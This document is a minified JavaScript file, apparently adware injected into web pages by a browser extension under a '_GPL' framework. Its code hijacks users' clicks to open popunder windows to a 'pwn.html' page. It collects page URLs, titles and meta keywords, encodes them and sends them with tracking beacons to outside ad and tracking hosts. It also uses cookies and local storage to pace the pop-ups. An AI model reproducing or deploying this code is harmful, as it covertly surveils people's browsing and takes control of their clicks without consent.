_GPL.j(function(n){!function(b,O,B,h,d,ja,ka,eb,fb,k,Ja,Z,M,gb,hb,ib,la,Ka,jb,kb,La,Ma,lb,mb,nb,ob,Na,pb,Oa,Pa,qb,rb,q,Qa,P,ma,Ra,sb,Sa,tb,Ta,na,Ua,ub,vb,Va,wb,Wa,v,r,oa,xb,s,Xa,$){function Q(){pa(f,P,Q);Ya(function(a,c){e=a;R||(R=!0,Za(),aa(),qa(f,P,aa),ra=Z(function(){36E5<+new h-sa&&S(!1)},5E3))})}function aa(){sa=+new h}function S(a){R&&(R=!1,O(ra),ba=!1,n("body").children().add("body,a").add(window).off(ta,ua),pa(f,P,aa),a||qa(f,P,Q))}function qa(a,c,l){if(g[la])a[la](c,l,!1);else a[Ka](ma+c,
l)}function Za(){ba=!0;n("body").children().add("body,a").add(window).on(ta,ua);if(H)try{b.log("Attempting to pop from extension to: "+e);var a="ld893_"+(C?"_"+d(C)+"_":"")+"_"+w(),c=b.proto+b.baseCDN+"/pwn.html?u="+d(e)+"&n="+a+"&r=";"h"==H?(ca(f,"createNewTab",{url:c,focused:"true"}),ca(f.documentElement,"createNewTab",{url:c,focused:"true"})):"w"==H&&ca(window,"openThatTabBitch",{url:c,isUnder:!1,attr:"z7b85_91c4"});var l=Z(function(){f.documentElement.getAttribute("z7b85_91c4")&&(O(l),S(!0),va(),
f.documentElement.removeAttribute("z7b85_91c4"))},100)}catch(da){}}function ca(a,c,l){if(f.createEvent){var b=f.createEvent("CustomEvent");b.initCustomEvent(c,!1,!1,l);a.dispatchEvent(b)}else b=f.createEventObject(),b.detail=l,b.realType=c,a.fireEvent("ondataavailable",b)}function T(a){a=g[Ta][Wa][Va]().match(Ja(a+"[/ ](\\d+)","i"));return k(a&&a[1],10)}function $a(a){if(e!=wa){a=a.target||a.srcElement;for(var c="";a;){x||(x=a.tagName);if("A"==a.tagName&&a.href&&a.protocol.toLowerCase().match(/^http/)){c=
a.protocol+"//"+a.host+a.pathname+a.search+a.hash;break}a=a.parentNode}c&&(e+="&t="+d(c.substring(0,Math.max(0,1500-e.length))));e+="&rt="+(+new h-xa);x&&(e+="&data_tag="+d(x));"/"!=g[q].pathname&&(e+="&mk="+d(b.B64.encode(ea().substring(0,Math.max(0,1500-e.length)))))}b.log("Popping to: "+e);a="ld893_"+(C?"_"+d(C)+"_":"")+"_"+w();return g[Ra](b.proto+b.baseCDN+"/pwn.html?u="+d(e)+"&n="+a+"&r=","_blank")}function ea(){function a(a){return a.toLowerCase().replace(/[.,!?]/g," ").split(" ")}var c=[];
n("title").length&&(c=c.concat(a(n("title").text())));n('meta[property="og:title"],meta[property="og:description"],meta[name="description"],meta[name="keywords"]').each(function(){var b=n.trim(n(this).attr("content"));b&&b.match(/^\s*[a-zA-Z0-9]/)&&(c=c.concat(a(b)))});return n.trim(function(a){var c=[];n.each(a,function(a,b){-1==n.inArray(b,c)&&c.push(b)});return c}(c).join(",").replace(/([,]+)/g,",").replace(/\s+/g," "))}function ya(){var a=g[q].href.substr(0,1500),c="/"!=g[q].pathname?ea():"",
a=a.replace(/:/g,"%3A"),c=c.replace(/:/g,"%3A").substring(0,Math.max(0,1500-a.length)),l=b.getSubId?"&subid="+b.getSubId("z7b85"):"",a=d(b.B64.encode(a+"::z-"+t+"-"+za+"::"+c));return b.proto+Aa+"/pops?c="+a+"&a=1&ch="+d(N)+l}function pa(a,c,b){if(g[na])a[na](c,b,!1);else a[Na](ma+c,b)}function ab(a){a=a||window.event||{};if("keydown"!=a.type&&(1<a.which||0<a.button)||H&&f.documentElement.getAttribute("z7b85_91c4"))return!0;for(a=a.target||a.srcElement;a;){if(a["91c4"])return!0;a=a.parentNode}return!1}
function I(a,c){a=k(a,10);isNaN(a)&&(a=k(U&&U.getItem(c)||b.gc(c,10),10)||0);return a}function V(){y=k(y,10)||0;m=k(m,10)||0;E=k(E,10)||0;var a=w(),c=m&&(new h(1E3*y)).getDate()!=(new h(1E3*a)).getDate();c&&(m=0,p.set(s,m));var b=!F||a-y>=J&&m<F,a=a-E>=z;return!u&&c||b&&a}function ua(a){if(!ab(a)){var c=ba&&bb();K=c&&$a(a);if(c&&"mousedown"==a.type&&Ba)try{a.target.click()}catch(l){}K&&!K.closed?(S(!0),va(),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popsuccess&u="+d(e)+"&cid="+b.vars.cid+
"&pid="+t+"&r="+999999999*Math.random(),W&&B(W),X&&B(X),cb(K)):K&&K.closed?X||(X=M(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popclose&u="+d(e)+"&location="+d(g[q].hostname)+"&pid="+t+"&tag="+d(x||"")+"&r="+999999999*Math.random()},1E3)):c&&(W||(W=M(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfail&u="+d(e)+"&location="+d(g[q].hostname)+"&pid="+t+"&tag="+d(x||"")+"&r="+999999999*Math.random()},1E3)))}}function cb(a){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popwinopen_new&u="+
d(e)+"&location="+d(g[q].hostname)+"&pid="+t+"&tag="+d(x||"")+"&r="+999999999*Math.random();var c=+new h,b=Z(function(){var da=+new h-c;if(5E3<=da)O(b);else try{if(!a||a.closed||!1!==a.closed)O(b),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popwinclosed_new&u="+d(e)+"&location="+d(g[q].hostname)+"&pid="+t+"&tag="+d(x||"")+"&delay="+da+"&r="+999999999*Math.random()}catch(f){}},200)}function bb(){if(!p.swf)return!0;y=I(p.get(v),v);316808>Ca.score&&(m=I(p.get(s),s));var a=Da(p.get(r));E=I(a[L],
r);return V()}function w(){return ja(new h/1E3)}function Ea(a,c,b){p.set(a,b);b=w();U&&U.setItem(a,b);c=k(c);var d=new h;d.setSeconds(d.getSeconds()+c);f.cookie=a+"="+b+";expires="+d.toUTCString()+";path=/;domain="+L}function va(){var a=w();Ea(v,J,a);p.set(Xa,a);y=a;p.set(s,++m);z&&Ea(r,z,Y+(Y&&",")+L+":"+a)}function Da(a){var c={},b=w(),d=[];a=(a||"").split(",");if(a.length){for(var e=0;e<a.length;++e){var f=a[e].split(":"),g=k(f[1],10);b-g<z&&(c[f[0]]=g,d.push(f[0]+":"+g))}Y=d.join(",");p.set(r,
Y)}return c}function fa(){return V()||u?1:w()-(k(E,10)||0)<z?Infinity:m>=F?"US"==b.vars.cid?149058:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?88620:59858:"US"==b.vars.cid?47432:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?59858:49928}function db(a){"US"==b.vars.cid?ga(a,47432,149058):-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?ga(a,59858,88620):ga(a,49928,59858);return V()}function ga(a,c,b){a>=c&&(J=0,a>=b&&m>=F&&(m=ka(0,F-1)))}function Fa(){B(ha);if(!u&&1735!=t){var a=fa(),c="http://clkmon.com/adServe/banners?pid=14442&cid="+
za+"&action=r&q=",e="/"!=g[q].pathname?ea():"",c=c+d(e.substring(0,Math.max(0,1500-c.length)));b.items.z7b85.callback({url:c,score:a});(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfallback&u="+d(q.hostname)+"&r="+999999999*Math.random()}}function Ya(a){b.items.z7b85={callback:function(c){B(ha);C="";if(c){c.cid&&(C=c.cid,c.url||(c.url=b.proto+Aa+"/click?c="+d(C)+(b.getSubId?"&subid="+b.getSubId("z7b85"):"")+(A?"&data_test="+d(A):"")));u&&!c.cid&&(c.url=wa,c.cid="xr");var e=k(c.score,10);if(u||
0<e&&db(e))xa=+new h,B(ia),c.url&&c.expires&&(B(Ga),Ga=M(function(){S(!0);Q()},1E3*k(c.expires,10))),Ca={score:e,now:new h/1},a(c.url,e)}}};!function l(){b.gc(oa)||p.get(["frt","_GPL_oo_z7b85",v,r,s,$],function(a){if(a.v.frt){if("1750"==t){var d=k(a.v._GPL_oo_z7b85,10)||0;if(86400>ja(new h/1E3)-d)return}b.vars.types&&b.vars.types.length&&-1<b.vars.types.indexOf("c")?H="h":f.body.getAttribute("data-openThatTabBitch")&&(d="20141007_cw 20141007_cw 20141007_cw 20141007_cw 20141007_cw 20141007_cw 20141007_cw 20141007_cw 20141007_cw 20141007_tw".split(" "),
A=a.v[$],A&&-1!=d.indexOf(A)||(A=d[Math.floor(Math.random()*d.length)],p.set($,A)),"20141007_tw"==A&&(H="w"));d=w();y=I(a.v[v],v);m=I(a.v[s],s);a=Da(a.v[r]);E=I(a[L],r);if(V()){a=fa();var e=f.createElement("script");e.src=ya()+"&ms="+a+"&r="+d;e.onerror=Fa;f.body.appendChild(e);ha=M(Fa,15E3)}else a=fa(),b.log("minScoreNeeded: "+a),Infinity>a&&!Ha&&!u&&(b.insertJS(ya()+"&ms="+a+"&r="+d),Ha=!0),B(ia),ia=M(l,1E3*(5+ka(d,y+J,E+z)-d))}})}()}var p=b.items.e6a00,g=window,f=g.document,U=g.localStorage,Ba=
T(La);T(Pa);T(Sa);T(Ua);var N=b.item_vars["22555_ch"]||b.item_vars.ch||"",J,y,E,G=b.dt(),G=G&&G.inherited&&G.inherited.t||[],u="x"==N||-1<G.indexOf("adult")||0==G.length&&0<n('meta[content="RTA-5042-1996-1400-1577-RTA"]').length;u&&(-1==G.indexOf("adult_block")?N="x":(N="x-issue",u=!1));var z,Aa="p.display-trk.com",R=!1,ra,sa,ba=!1,L=b.gd(),e,K,xa=0,Ga,Y="",m=0,F,Ca={},C="",ia,Ha=!1,A,W,X,ha,x,ta=Ba?Qa+Oa:Ma,Ia=b.zoneid("z7b85",!0).split("_"),za=Ia[0],t=Ia[1]||b.vars.pid,wa="http://secure.xsrving.com/display?size=800x600&ch="+
d(N)+"&referer="+d(L),H=!1;b.canLoad("ld893")||b.gc(oa)||(window.name||"").match(/^a652c_/)||1797==t&&"GB"==b.vars.cid||"facebook.com"==L||(u?(F=J=0,z=180,v+="_xr",r+="_xr",s+="_xr"):(J=360,F=4,z=360),Q())}(_GPL,clearInterval,clearTimeout,Date,encodeURIComponent,Math.floor,Math.max,Math.random,null,parseInt,RegExp,setInterval,setTimeout,String,void 0,"about","addEventListener","attachEvent","blank","blur","chrome","click","client","close","javascript:window.close()","contentDocument","detachEvent",
"dialog","down","firefox","focus","load","location","mouse","mousemove","on","open","opener","opera","over","navigator","removeEventListener","safari","screen","showModalDialog","toLowerCase","up","userAgent","ld893_pop_g","ld893_pop_s","z7b85_bl1","ld893_s","ld893_pop_gs","ld893_spopd","z7b85_test")});
